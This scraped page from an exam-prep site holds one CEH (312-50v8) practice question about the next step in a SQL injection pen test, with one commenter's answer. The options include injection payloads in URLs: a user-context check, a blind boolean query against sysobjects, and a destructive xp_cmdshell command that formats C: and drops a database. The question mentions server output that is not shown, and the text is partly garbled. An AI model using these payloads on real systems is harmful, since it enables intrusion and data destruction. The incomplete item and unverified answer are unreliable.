bundle

50%

You are here: Home > ECCouncil Exam Questions > 312-50v8 > What is the next step you should do?

PrepAway - Latest Free Exam Questions & Answers

What is the next step you should do?

seenagapeJuly 5, 2013

You are conducting pen-test against a company’s website using SQL Injection techniques. You
enter “anuthing or 1=1-“ in the username filed of an authentication form. This is the output returned
from the server.
What is the next step you should do?

PrepAway - Latest Free Exam Questions & Answers

A.
Identify the user context of the web application by running_
http://www.example.com/order/include_rsa_asp?pressReleaseID=5
AND
USER_NAME() = ‘dbo’

B.
Identify the database and table name by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5
AND
ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE
xtype=’U’),1))) > 109

C.
Format the C: drive and delete the database by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND
xp_cmdshell ‘format c: /q /yes ‘; drop database myDB; –D. Reboot the web server by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5

One Comment on “What is the next step you should do?”

miguel says:

June 6, 2014 at 12:54 am

A

Log in to Reply

Leave a Reply Cancel reply

You must be logged in to post a comment.

Move Up